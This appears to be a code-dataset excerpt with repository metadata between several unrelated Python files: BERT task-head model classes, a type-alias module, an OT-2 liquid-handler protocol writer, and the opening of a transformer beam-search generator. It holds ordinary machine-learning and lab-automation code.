output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
outputs = (prediction_scores,) + outputs[2:] # Add hidden states and attention if they are here
if labels is not None:
# we are doing next-token prediction; shift prediction scores and input ids by one
prediction_scores = prediction_scores[:, :-1, :].contiguous()
labels = labels[:, 1:].contiguous()
loss_fct = CrossEntropyLoss()
ltr_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
outputs = (ltr_lm_loss,) + outputs
return outputs # (ltr_lm_loss), prediction_scores, (hidden_states), (attentions)
def prepare_inputs_for_generation(self, input_ids, attention_mask=None, **model_kwargs):
input_shape = input_ids.shape
# if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
if attention_mask is None:
attention_mask = input_ids.new_ones(input_shape)
return {"input_ids": input_ids, "attention_mask": attention_mask}
@add_start_docstrings("""Bert Model with a `language modeling` head on top. """, BERT_START_DOCSTRING)
class BertForMaskedLM(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
assert (
not config.is_decoder
), "If you want to use `BertForMaskedLM` make sure `config.is_decoder=False` for bi-directional self-attention."
self.bert = BertModel(config)
self.cls = BertOnlyMLMHead(config)
self.init_weights()
def get_output_embeddings(self):
return self.cls.predictions.decoder
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=None,
output_hidden_states=None,
**kwargs
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Labels for computing the masked language modeling loss.
Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring)
Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels
in ``[0, ..., config.vocab_size]``
kwargs (:obj:`Dict[str, any]`, optional, defaults to `{}`):
Used to hide legacy arguments that have been deprecated.
Returns:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
masked_lm_loss (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
Masked language modeling loss.
prediction_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`)
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertTokenizer, BertForMaskedLM
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForMaskedLM.from_pretrained('bert-base-uncased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
outputs = model(input_ids, labels=input_ids)
loss, prediction_scores = outputs[:2]
"""
if "masked_lm_labels" in kwargs:
warnings.warn(
"The `masked_lm_labels` argument is deprecated and will be removed in a future version, use `labels` instead.",
DeprecationWarning,
)
labels = kwargs.pop("masked_lm_labels")
assert "lm_labels" not in kwargs, "Use `BertWithLMHead` for autoregressive language modeling task."
assert kwargs == {}, f"Unexpected keyword arguments: {list(kwargs.keys())}."
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
outputs = (prediction_scores,) + outputs[2:] # Add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss() # -100 index = padding token
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
outputs = (masked_lm_loss,) + outputs
return outputs # (masked_lm_loss), prediction_scores, (hidden_states), (attentions)
def prepare_inputs_for_generation(self, input_ids, attention_mask=None, **model_kwargs):
input_shape = input_ids.shape
effective_batch_size = input_shape[0]
# add a dummy token
assert self.config.pad_token_id is not None, "The PAD token should be defined for generation"
attention_mask = torch.cat([attention_mask, attention_mask.new_zeros((attention_mask.shape[0], 1))], dim=-1)
dummy_token = torch.full(
(effective_batch_size, 1), self.config.pad_token_id, dtype=torch.long, device=input_ids.device
)
input_ids = torch.cat([input_ids, dummy_token], dim=1)
return {"input_ids": input_ids, "attention_mask": attention_mask}
@add_start_docstrings(
"""Bert Model with a `next sentence prediction (classification)` head on top. """, BERT_START_DOCSTRING,
)
class BertForNextSentencePrediction(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.bert = BertModel(config)
self.cls = BertOnlyNSPHead(config)
self.init_weights()
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
next_sentence_label=None,
output_attentions=None,
output_hidden_states=None,
):
r"""
next_sentence_label (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair (see ``input_ids`` docstring)
Indices should be in ``[0, 1]``.
``0`` indicates sequence B is a continuation of sequence A,
``1`` indicates sequence B is a random sequence.
Returns:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when :obj:`next_sentence_label` is provided):
Next sequence prediction (classification) loss.
seq_relationship_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, 2)`):
Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation before SoftMax).
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertTokenizer, BertForNextSentencePrediction
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForNextSentencePrediction.from_pretrained('bert-base-uncased')
prompt = "In Italy, pizza served in formal settings, such as at a restaurant, is presented unsliced."
next_sentence = "The sky is blue due to the shorter wavelength of blue light."
encoding = tokenizer.encode_plus(prompt, next_sentence, return_tensors='pt')
loss, logits = model(**encoding, next_sentence_label=torch.LongTensor([1]))
assert logits[0, 0] < logits[0, 1] # next sentence was random
"""
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
pooled_output = outputs[1]
seq_relationship_score = self.cls(pooled_output)
outputs = (seq_relationship_score,) + outputs[2:] # add hidden states and attention if they are here
if next_sentence_label is not None:
loss_fct = CrossEntropyLoss()
next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
outputs = (next_sentence_loss,) + outputs
return outputs # (next_sentence_loss), seq_relationship_score, (hidden_states), (attentions)
@add_start_docstrings(
"""Bert Model transformer with a sequence classification/regression head on top (a linear layer on top of
the pooled output) e.g. for GLUE tasks. """,
BERT_START_DOCSTRING,
)
class BertForSequenceClassification(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bert = BertModel(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for computing the sequence classification/regression loss.
Indices should be in :obj:`[0, ..., config.num_labels - 1]`.
If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
Returns:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when :obj:`label` is provided):
Classification (or regression if config.num_labels==1) loss.
logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, config.num_labels)`):
Classification (or regression if config.num_labels==1) scores (before SoftMax).
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertTokenizer, BertForSequenceClassification
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForSequenceClassification.from_pretrained('bert-base-uncased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
labels = torch.tensor([1]).unsqueeze(0) # Batch size 1
outputs = model(input_ids, labels=labels)
loss, logits = outputs[:2]
"""
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
outputs = (logits,) + outputs[2:] # add hidden states and attention if they are here
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs # (loss), logits, (hidden_states), (attentions)
@add_start_docstrings(
"""Bert Model with a multiple choice classification head on top (a linear layer on top of
the pooled output and a softmax) e.g. for RocStories/SWAG tasks. """,
BERT_START_DOCSTRING,
)
class BertForMultipleChoice(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.bert = BertModel(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, 1)
self.init_weights()
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, num_choices, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for computing the multiple choice classification loss.
Indices should be in ``[0, ..., num_choices-1]`` where `num_choices` is the size of the second dimension
of the input tensors. (see `input_ids` above)
Returns:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
loss (:obj:`torch.FloatTensor` of shape `(1,)`, `optional`, returned when :obj:`labels` is provided):
Classification loss.
classification_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, num_choices)`):
`num_choices` is the second dimension of the input tensors. (see `input_ids` above).
Classification scores (before SoftMax).
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertTokenizer, BertForMultipleChoice
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForMultipleChoice.from_pretrained('bert-base-uncased')
prompt = "In Italy, pizza served in formal settings, such as at a restaurant, is presented unsliced."
choice0 = "It is eaten with a fork and a knife."
choice1 = "It is eaten while held in the hand."
labels = torch.tensor(0).unsqueeze(0) # choice0 is correct (according to Wikipedia ;)), batch size 1
encoding = tokenizer.batch_encode_plus([[prompt, choice0], [prompt, choice1]], return_tensors='pt', pad_to_max_length=True)
outputs = model(**{k: v.unsqueeze(0) for k,v in encoding.items()}, labels=labels) # batch size is 1
# the linear classifier still needs to be trained
loss, logits = outputs[:2]
"""
num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1]
input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None
attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None
token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None
position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None
inputs_embeds = (
inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1))
if inputs_embeds is not None
else None
)
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
reshaped_logits = logits.view(-1, num_choices)
outputs = (reshaped_logits,) + outputs[2:] # add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(reshaped_logits, labels)
outputs = (loss,) + outputs
return outputs # (loss), reshaped_logits, (hidden_states), (attentions)
@add_start_docstrings(
"""Bert Model with a token classification head on top (a linear layer on top of
the hidden-states output) e.g. for Named-Entity-Recognition (NER) tasks. """,
BERT_START_DOCSTRING,
)
class BertForTokenClassification(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bert = BertModel(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Labels for computing the token classification loss.
Indices should be in ``[0, ..., config.num_labels - 1]``.
Returns:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when ``labels`` is provided) :
Classification loss.
scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.num_labels)`)
Classification scores (before SoftMax).
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertTokenizer, BertForTokenClassification
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForTokenClassification.from_pretrained('bert-base-uncased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
labels = torch.tensor([1] * input_ids.size(1)).unsqueeze(0) # Batch size 1
outputs = model(input_ids, labels=labels)
loss, scores = outputs[:2]
"""
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
outputs = (logits,) + outputs[2:] # add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.num_labels)
active_labels = torch.where(
active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels)
)
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs # (loss), scores, (hidden_states), (attentions)
@add_start_docstrings(
"""Bert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layers on top of the hidden-states output to compute `span start logits` and `span end logits`). """,
BERT_START_DOCSTRING,
)
class BertForQuestionAnswering(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bert = BertModel(config)
self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
start_positions=None,
end_positions=None,
output_attentions=None,
output_hidden_states=None,
):
r"""
start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`).
Position outside of the sequence are not taken into account for computing the loss.
end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`).
Position outside of the sequence are not taken into account for computing the loss.
Returns:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when :obj:`labels` is provided):
Total span extraction loss is the sum of a Cross-Entropy for the start and end positions.
start_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length,)`):
Span-start scores (before SoftMax).
end_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length,)`):
Span-end scores (before SoftMax).
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertTokenizer, BertForQuestionAnswering
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForQuestionAnswering.from_pretrained('bert-large-uncased-whole-word-masking-finetuned-squad')
question, text = "Who was Jim Henson?", "Jim Henson was a nice puppet"
encoding = tokenizer.encode_plus(question, text)
input_ids, token_type_ids = encoding["input_ids"], encoding["token_type_ids"]
start_scores, end_scores = model(torch.tensor([input_ids]), token_type_ids=torch.tensor([token_type_ids]))
all_tokens = tokenizer.convert_ids_to_tokens(input_ids)
answer = ' '.join(all_tokens[torch.argmax(start_scores) : torch.argmax(end_scores)+1])
assert answer == "a nice puppet"
"""
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
print('first outputs■', outputs, len(outputs))
sequence_output = outputs[0]
print('sequence_output■', len(sequence_output), len(sequence_output[0]))
logits = self.qa_outputs(sequence_output)
print('logits■', len(logits), len(logits[0]))
start_logits, end_logits = logits.split(1, dim=-1)
print('start_logits/end_logits■', len(start_logits), len(start_logits[0]), len(end_logits), len(end_logits[0]))
start_logits = start_logits.squeeze(-1)
print('start_logits■', len(start_logits),len(start_logits[0]))
end_logits = end_logits.squeeze(-1)
print('end_logits■', len(end_logits), len(end_logits[0]))
outputs = (start_logits, end_logits,) + outputs[2:]
print('outputs■', outputs, len(outputs), len(outputs[0]))
if start_positions is not None and end_positions is not None:
# If we are on multi-GPU, split add a dimension
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
# sometimes the start/end positions are outside our model inputs, we ignore these terms
ignored_index = start_logits.size(1)
start_positions.clamp_(0, ignored_index)
end_positions.clamp_(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
outputs = (total_loss,) + outputs
return outputs # (loss), start_logits, end_logits, (hidden_states), (attentions)
| 45.792419 | 168 | 0.667915 |
795afad6321eca85934937015fb6489c33779863 | 156 | py | Python | scripts/analysis/dependencies/fq_names_types.py | JetBrains-Research/Lupa | c105487621564c60cae17395bf32eb40868ceb89 | [
"Apache-2.0"
] | 16 | 2022-01-11T00:32:20.000Z | 2022-03-25T21:40:52.000Z | scripts/analysis/dependencies/fq_names_types.py | JetBrains-Research/Lupa | c105487621564c60cae17395bf32eb40868ceb89 | [
"Apache-2.0"
] | 5 | 2022-01-11T09:36:52.000Z | 2022-03-14T10:24:31.000Z | scripts/analysis/dependencies/fq_names_types.py | JetBrains-Research/Lupa | c105487621564c60cae17395bf32eb40868ceb89 | [
"Apache-2.0"
] | 2 | 2022-03-07T20:08:56.000Z | 2022-03-25T21:40:56.000Z | from typing import Dict, List, Union
FqNamesDict = Dict[str, Union['FqNamesDict', int]]
FqNamesStats = Dict[str, int]
FqNamesGroups = Dict[str, List[str]]
| 26 | 50 | 0.737179 |
795afd29d15badcf802a70c2760f1fd46133c72e | 2,171 | py | Python | ot2_protocol_generator/protocol_writer.py | olichen/liquidhandler | 6470e96432f885e7faac7afc4fd34b88feb9cae1 | [
"MIT"
] | null | null | null | ot2_protocol_generator/protocol_writer.py | olichen/liquidhandler | 6470e96432f885e7faac7afc4fd34b88feb9cae1 | [
"MIT"
] | null | null | null | ot2_protocol_generator/protocol_writer.py | olichen/liquidhandler | 6470e96432f885e7faac7afc4fd34b88feb9cae1 | [
"MIT"
] | null | null | null | from .helpers import format_helper
from .helpers import csv_helper
# Class that handles receiving/validating data and outputting the protocol
class ProtocolWriter:
def __init__(self):
self._pipette_data = None
self._plate_data = []
self._plate_csv = []
self._fh = format_helper.FormatHelper()
# Add another source of data (either pipette or plate data)
def addData(self, data):
if data.data_type == 'pipette':
self._pipette_data = data
elif data.data_type == 'plate':
self._plate_data.append(data)
# Add csv data. Validate multi-head transfer data
csv_data = csv_helper.CSVReader(data.csv_file_loc)
if self._pipette_data.isMulti():
csv_data.validate_multi_transfer()
self._plate_csv.append(csv_data.volumes)
# Open the output file and write everything
def saveOutput(self, output_file):
with open(output_file, 'w') as f:
f.write(self._fh.header())
self._output_tip_racks(f)
self._output__pipette_data(f)
self._output_transfer_data(f)
# Iterate through all the input data and write the tip rack definitions
def _output_tip_racks(self, f):
for d in self._plate_data:
f.write(self._fh.tip_rack(d.tip_rack_name, d.tip_rack_loc))
# Write the pipette definition
def _output__pipette_data(self, f):
d = self._pipette_data
f.write(self._fh.pipette(d.pipette_name, d.pipette_loc))
# Iterate through all the input data and write the plate definitions
# followed by all the transfers
def _output_transfer_data(self, f):
for d, csv in zip(self._plate_data, self._plate_csv):
f.write(self._fh.src_plate(d.src_plate_name, d.src_plate_loc))
f.write(self._fh.dest_plate(d.dest_plate_name, d.dest_plate_loc))
if self._pipette_data.isMulti():
for i in range(0,96,8):
f.write(self._fh.transfer(csv[i], i))
else:
for i, vol in enumerate(csv):
f.write(self._fh.transfer(vol, i))
| 38.087719 | 77 | 0.637955 |
795afdb328f251bd5423e25313fe8f3b2318c9c5 | 5,646 | py | Python | Birnn_Transformer/ncc/eval/summarization/transformer_generator.py | code-backdoor/code-backdoor | 1eeb3d79aa8a54c8f08e8d0156b569de5edd974e | [
"MIT"
] | 71 | 2020-12-04T02:18:13.000Z | 2022-03-30T15:19:50.000Z | Birnn_Transformer/ncc/eval/summarization/transformer_generator.py | code-backdoor/code-backdoor | 1eeb3d79aa8a54c8f08e8d0156b569de5edd974e | [
"MIT"
] | 4 | 2021-03-10T17:48:50.000Z | 2022-03-13T10:42:22.000Z | Birnn_Transformer/ncc/eval/summarization/transformer_generator.py | code-backdoor/code-backdoor | 1eeb3d79aa8a54c8f08e8d0156b569de5edd974e | [
"MIT"
] | 11 | 2020-12-09T12:17:44.000Z | 2022-03-30T09:02:13.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
from ncc.utils import utils
import torch.nn.functional as F
from torch import Tensor
from typing import Optional, List, Dict
class TransformerGenerator(object):
def __init__(
self,
tgt_dict,
beam_size=1,
max_len_a=0,
max_len_b=200,
min_len=1,
normalize_scores=True,
len_penalty=1.,
unk_penalty=0.,
retain_dropout=False,
temperature=1.,
match_source_len=False,
no_repeat_ngram_size=0,
eos=None
):
"""Generates translations of a given source sentence.
Args:
tgt_dict (~fairseq.data.Dictionary): target dictionary
beam_size (int, optional): beam width (default: 1)
max_len_a/b (int, optional): generate sequences of maximum length
ax + b, where x is the source length
min_len (int, optional): the minimum length of the generated output
(not including end-of-sentence)
normalize_scores (bool, optional): normalize scores by the length
of the output (default: True)
len_penalty (float, optional): length penalty, where <1.0 favors
shorter, >1.0 favors longer sentences (default: 1.0)
unk_penalty (float, optional): unknown word penalty, where <0
produces more unks, >0 produces fewer (default: 0.0)
retain_dropout (bool, optional): use dropout when generating
(default: False)
temperature (float, optional): temperature, where values
>1.0 produce more uniform samples and values <1.0 produce
sharper samples (default: 1.0)
match_source_len (bool, optional): outputs should match the source
length (default: False)
"""
self.pad = tgt_dict.pad()
self.unk = tgt_dict.unk()
self.bos = tgt_dict.bos()
self.eos = tgt_dict.eos() if eos is None else eos
self.vocab_size = len(tgt_dict)
self.beam_size = beam_size
# the max beam size is the dictionary size - 1, since we never select pad
self.beam_size = min(beam_size, self.vocab_size - 1)
self.max_len_a = max_len_a
self.max_len_b = max_len_b
self.min_len = min_len
self.normalize_scores = normalize_scores
self.len_penalty = len_penalty
self.unk_penalty = unk_penalty
self.retain_dropout = retain_dropout
self.temperature = temperature
self.match_source_len = match_source_len
self.no_repeat_ngram_size = no_repeat_ngram_size
assert temperature > 0, '--temperature must be greater than 0'
@torch.no_grad()
def generate(self, models, sample, **kwargs):
"""Generate a batch of translations.
Args:
models (List[~fairseq.models.NccModel]): ensemble of models
sample (dict): batch
prefix_tokens (torch.LongTensor, optional): force decoder to begin
with these tokens
bos_token (int, optional): beginning of sentence token
(default: self.eos)
"""
model = models[0] # for ensemble expansion
if not self.retain_dropout:
model.eval()
src_tokens = sample['net_input']['src_tokens']
src_lengths = (src_tokens != self.pad).int().sum(-1)
bsz, src_len = src_tokens.size()
device = src_tokens.device
if self.match_source_len:
max_len = src_lengths.max().item()
else:
max_len = min(
int(self.max_len_a * src_len + self.max_len_b),
# exclude the EOS marker
model.max_decoder_positions() - 1,
)
assert self.min_len <= max_len, 'min_len cannot be larger than max_len, please adjust these!'
